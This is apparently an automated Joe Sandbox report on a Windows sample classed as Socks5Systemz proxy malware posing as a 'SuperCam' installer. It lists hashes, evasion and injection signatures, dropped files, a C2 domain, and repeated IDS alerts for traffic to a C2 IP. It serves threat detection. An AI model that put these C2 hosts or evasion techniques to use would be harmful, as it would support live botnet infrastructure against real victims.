Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vc8Kx5C54G.exe

Overview

General Information

Sample name:vc8Kx5C54G.exe
renamed because original name is a hash value
Original sample name:2a64b62e8ed1c42a2487233e83d9966d.exe
Analysis ID:1580574
MD5:2a64b62e8ed1c42a2487233e83d9966d
SHA1:1f72177f8d8c7e5b79e89ea3409817944e8fddc2
SHA256:644eeb4227d395ffd4de04707607098d39281999d7b99746e34a3bdbfc0bd47c
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • vc8Kx5C54G.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\vc8Kx5C54G.exe" MD5: 2A64B62E8ED1C42A2487233E83D9966D)
    • vc8Kx5C54G.tmp (PID: 6864 cmdline: "C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp" /SL5="$10414,3527699,54272,C:\Users\user\Desktop\vc8Kx5C54G.exe" MD5: 04B1C24DA7892C010556F7B7C0E3160A)
      • net.exe (PID: 6952 cmdline: "C:\Windows\system32\net.exe" pause super_cam_11234 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6156 cmdline: C:\Windows\system32\net1 pause super_cam_11234 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • supercam360.exe (PID: 6176 cmdline: "C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe" -i MD5: 002737DAE0350F10594A62D75616F208)
  • cleanup
{"C2 list": ["ceijjfu.net"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-9AUOP.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\ProgramData\EShineEncoder\EShineEncoder.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000005.00000000.1687909842.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000005.00000002.2920022648.0000000002752000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000001.00000002.2920111752.00000000058C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: supercam360.exe PID: 6176JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  5.0.supercam360.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-25T09:17:54.149955+010020494671A Network Trojan was detected192.168.2.449736185.196.9.6780TCP
                    2024-12-25T09:17:55.752769+010020494671A Network Trojan was detected192.168.2.449737185.196.9.6780TCP
                    2024-12-25T09:17:57.438512+010020494671A Network Trojan was detected192.168.2.449740185.196.9.6780TCP
                    2024-12-25T09:17:59.027945+010020494671A Network Trojan was detected192.168.2.449741185.196.9.6780TCP
                    2024-12-25T09:18:00.623810+010020494671A Network Trojan was detected192.168.2.449747185.196.9.6780TCP
                    2024-12-25T09:18:02.216329+010020494671A Network Trojan was detected192.168.2.449753185.196.9.6780TCP
                    2024-12-25T09:18:03.809859+010020494671A Network Trojan was detected192.168.2.449754185.196.9.6780TCP
                    2024-12-25T09:18:05.398301+010020494671A Network Trojan was detected192.168.2.449760185.196.9.6780TCP
                    2024-12-25T09:18:05.973086+010020494671A Network Trojan was detected192.168.2.449760185.196.9.6780TCP
                    2024-12-25T09:18:07.563017+010020494671A Network Trojan was detected192.168.2.449766185.196.9.6780TCP
                    2024-12-25T09:18:09.155867+010020494671A Network Trojan was detected192.168.2.449772185.196.9.6780TCP
                    2024-12-25T09:18:10.748577+010020494671A Network Trojan was detected192.168.2.449778185.196.9.6780TCP
                    2024-12-25T09:18:12.340143+010020494671A Network Trojan was detected192.168.2.449779185.196.9.6780TCP
                    2024-12-25T09:18:13.932504+010020494671A Network Trojan was detected192.168.2.449785185.196.9.6780TCP
                    2024-12-25T09:18:15.537501+010020494671A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:16.120016+010020494671A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:16.701518+010020494671A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:18.344463+010020494671A Network Trojan was detected192.168.2.449797185.196.9.6780TCP
                    2024-12-25T09:18:19.930721+010020494671A Network Trojan was detected192.168.2.449803185.196.9.6780TCP
                    2024-12-25T09:18:21.568883+010020494671A Network Trojan was detected192.168.2.449809185.196.9.6780TCP
                    2024-12-25T09:18:23.171770+010020494671A Network Trojan was detected192.168.2.449810185.196.9.6780TCP
                    2024-12-25T09:18:24.759622+010020494671A Network Trojan was detected192.168.2.449816185.196.9.6780TCP
                    2024-12-25T09:18:25.338114+010020494671A Network Trojan was detected192.168.2.449816185.196.9.6780TCP
                    2024-12-25T09:18:27.002387+010020494671A Network Trojan was detected192.168.2.449821185.196.9.6780TCP
                    2024-12-25T09:18:28.595461+010020494671A Network Trojan was detected192.168.2.449827185.196.9.6780TCP
                    2024-12-25T09:18:30.214459+010020494671A Network Trojan was detected192.168.2.449833185.196.9.6780TCP
                    2024-12-25T09:18:31.814868+010020494671A Network Trojan was detected192.168.2.449834185.196.9.6780TCP
                    2024-12-25T09:18:33.406416+010020494671A Network Trojan was detected192.168.2.449840185.196.9.6780TCP
                    2024-12-25T09:18:34.998748+010020494671A Network Trojan was detected192.168.2.449846185.196.9.6780TCP
                    2024-12-25T09:18:36.589843+010020494671A Network Trojan was detected192.168.2.449849185.196.9.6780TCP
                    2024-12-25T09:18:38.182225+010020494671A Network Trojan was detected192.168.2.449853185.196.9.6780TCP
                    2024-12-25T09:18:39.767910+010020494671A Network Trojan was detected192.168.2.449859185.196.9.6780TCP
                    2024-12-25T09:18:41.409504+010020494671A Network Trojan was detected192.168.2.449865185.196.9.6780TCP
                    2024-12-25T09:18:42.999262+010020494671A Network Trojan was detected192.168.2.449866185.196.9.6780TCP
                    2024-12-25T09:18:44.649727+010020494671A Network Trojan was detected192.168.2.449872185.196.9.6780TCP
                    2024-12-25T09:18:45.234269+010020494671A Network Trojan was detected192.168.2.449872185.196.9.6780TCP
                    2024-12-25T09:18:47.001145+010020494671A Network Trojan was detected192.168.2.449878185.196.9.6780TCP
                    2024-12-25T09:18:48.587573+010020494671A Network Trojan was detected192.168.2.449883185.196.9.6780TCP
                    2024-12-25T09:18:50.193865+010020494671A Network Trojan was detected192.168.2.449889185.196.9.6780TCP
                    2024-12-25T09:18:50.780722+010020494671A Network Trojan was detected192.168.2.449889185.196.9.6780TCP
                    2024-12-25T09:18:52.378431+010020494671A Network Trojan was detected192.168.2.449895185.196.9.6780TCP
                    2024-12-25T09:18:53.961977+010020494671A Network Trojan was detected192.168.2.449897185.196.9.6780TCP
                    2024-12-25T09:18:55.539000+010020494671A Network Trojan was detected192.168.2.449902185.196.9.6780TCP
                    2024-12-25T09:18:57.140811+010020494671A Network Trojan was detected192.168.2.449908185.196.9.6780TCP
                    2024-12-25T09:18:58.961360+010020494671A Network Trojan was detected192.168.2.449914185.196.9.6780TCP
                    2024-12-25T09:19:00.565477+010020494671A Network Trojan was detected192.168.2.449916185.196.9.6780TCP
                    2024-12-25T09:19:02.159920+010020494671A Network Trojan was detected192.168.2.449921185.196.9.6780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-25T09:17:54.149955+010020501121A Network Trojan was detected192.168.2.449736185.196.9.6780TCP
                    2024-12-25T09:17:55.752769+010020501121A Network Trojan was detected192.168.2.449737185.196.9.6780TCP
                    2024-12-25T09:17:57.438512+010020501121A Network Trojan was detected192.168.2.449740185.196.9.6780TCP
                    2024-12-25T09:17:59.027945+010020501121A Network Trojan was detected192.168.2.449741185.196.9.6780TCP
                    2024-12-25T09:18:00.623810+010020501121A Network Trojan was detected192.168.2.449747185.196.9.6780TCP
                    2024-12-25T09:18:02.216329+010020501121A Network Trojan was detected192.168.2.449753185.196.9.6780TCP
                    2024-12-25T09:18:03.809859+010020501121A Network Trojan was detected192.168.2.449754185.196.9.6780TCP
                    2024-12-25T09:18:05.398301+010020501121A Network Trojan was detected192.168.2.449760185.196.9.6780TCP
                    2024-12-25T09:18:05.973086+010020501121A Network Trojan was detected192.168.2.449760185.196.9.6780TCP
                    2024-12-25T09:18:07.563017+010020501121A Network Trojan was detected192.168.2.449766185.196.9.6780TCP
                    2024-12-25T09:18:09.155867+010020501121A Network Trojan was detected192.168.2.449772185.196.9.6780TCP
                    2024-12-25T09:18:10.748577+010020501121A Network Trojan was detected192.168.2.449778185.196.9.6780TCP
                    2024-12-25T09:18:12.340143+010020501121A Network Trojan was detected192.168.2.449779185.196.9.6780TCP
                    2024-12-25T09:18:13.932504+010020501121A Network Trojan was detected192.168.2.449785185.196.9.6780TCP
                    2024-12-25T09:18:15.537501+010020501121A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:16.120016+010020501121A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:16.701518+010020501121A Network Trojan was detected192.168.2.449791185.196.9.6780TCP
                    2024-12-25T09:18:18.344463+010020501121A Network Trojan was detected192.168.2.449797185.196.9.6780TCP
                    2024-12-25T09:18:19.930721+010020501121A Network Trojan was detected192.168.2.449803185.196.9.6780TCP
                    2024-12-25T09:18:21.568883+010020501121A Network Trojan was detected192.168.2.449809185.196.9.6780TCP
                    2024-12-25T09:18:23.171770+010020501121A Network Trojan was detected192.168.2.449810185.196.9.6780TCP
                    2024-12-25T09:18:24.759622+010020501121A Network Trojan was detected192.168.2.449816185.196.9.6780TCP
                    2024-12-25T09:18:25.338114+010020501121A Network Trojan was detected192.168.2.449816185.196.9.6780TCP
                    2024-12-25T09:18:27.002387+010020501121A Network Trojan was detected192.168.2.449821185.196.9.6780TCP
                    2024-12-25T09:18:28.595461+010020501121A Network Trojan was detected192.168.2.449827185.196.9.6780TCP
                    2024-12-25T09:18:30.214459+010020501121A Network Trojan was detected192.168.2.449833185.196.9.6780TCP
                    2024-12-25T09:18:31.814868+010020501121A Network Trojan was detected192.168.2.449834185.196.9.6780TCP
                    2024-12-25T09:18:33.406416+010020501121A Network Trojan was detected192.168.2.449840185.196.9.6780TCP
                    2024-12-25T09:18:34.998748+010020501121A Network Trojan was detected192.168.2.449846185.196.9.6780TCP
                    2024-12-25T09:18:36.589843+010020501121A Network Trojan was detected192.168.2.449849185.196.9.6780TCP
                    2024-12-25T09:18:38.182225+010020501121A Network Trojan was detected192.168.2.449853185.196.9.6780TCP
                    2024-12-25T09:18:39.767910+010020501121A Network Trojan was detected192.168.2.449859185.196.9.6780TCP
                    2024-12-25T09:18:41.409504+010020501121A Network Trojan was detected192.168.2.449865185.196.9.6780TCP
                    2024-12-25T09:18:42.999262+010020501121A Network Trojan was detected192.168.2.449866185.196.9.6780TCP
                    2024-12-25T09:18:44.649727+010020501121A Network Trojan was detected192.168.2.449872185.196.9.6780TCP
                    2024-12-25T09:18:45.234269+010020501121A Network Trojan was detected192.168.2.449872185.196.9.6780TCP
                    2024-12-25T09:18:47.001145+010020501121A Network Trojan was detected192.168.2.449878185.196.9.6780TCP
                    2024-12-25T09:18:48.587573+010020501121A Network Trojan was detected192.168.2.449883185.196.9.6780TCP
                    2024-12-25T09:18:50.193865+010020501121A Network Trojan was detected192.168.2.449889185.196.9.6780TCP
                    2024-12-25T09:18:50.780722+010020501121A Network Trojan was detected192.168.2.449889185.196.9.6780TCP
                    2024-12-25T09:18:52.378431+010020501121A Network Trojan was detected192.168.2.449895185.196.9.6780TCP
                    2024-12-25T09:18:53.961977+010020501121A Network Trojan was detected192.168.2.449897185.196.9.6780TCP
                    2024-12-25T09:18:55.539000+010020501121A Network Trojan was detected192.168.2.449902185.196.9.6780TCP
                    2024-12-25T09:18:57.140811+010020501121A Network Trojan was detected192.168.2.449908185.196.9.6780TCP
                    2024-12-25T09:18:58.961360+010020501121A Network Trojan was detected192.168.2.449914185.196.9.6780TCP
                    2024-12-25T09:19:00.565477+010020501121A Network Trojan was detected192.168.2.449916185.196.9.6780TCP
                    2024-12-25T09:19:02.159920+010020501121A Network Trojan was detected192.168.2.449921185.196.9.6780TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: supercam360.exe.6176.5.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ceijjfu.net"]}
                    Source: C:\ProgramData\EShineEncoder\EShineEncoder.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeReversingLabs: Detection: 73%
                    Source: vc8Kx5C54G.exeReversingLabs: Detection: 52%
                    Source: vc8Kx5C54G.exeVirustotal: Detection: 50%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\EShineEncoder\EShineEncoder.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFA8
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045D05C ArcFourCrypt,1_2_0045D05C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045D074 ArcFourCrypt,1_2_0045D074
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeUnpacked PE file: 5.2.supercam360.exe.400000.0.unpack
                    Source: vc8Kx5C54G.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SuperCam_is1Jump to behavior
                    Source: Binary string: msvcp71.pdbx# source: is-C77TD.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-MQ3QG.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-C77TD.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-F7KI7.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-MQ3QG.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49754 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49754 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49778 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49778 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49785 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49785 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49753 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49740 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49753 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49737 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49737 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49740 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49766 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49766 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49747 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49747 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49741 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49741 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49760 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49760 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49791 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49791 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49797 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49797 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49846 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49846 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49834 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49834 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49810 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49810 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49853 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49853 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49849 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49779 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49779 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49866 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49866 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49849 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49914 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49914 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49908 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49908 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49897 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49897 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49902 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49902 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49772 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49772 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49840 -> 185.196.9.67:80
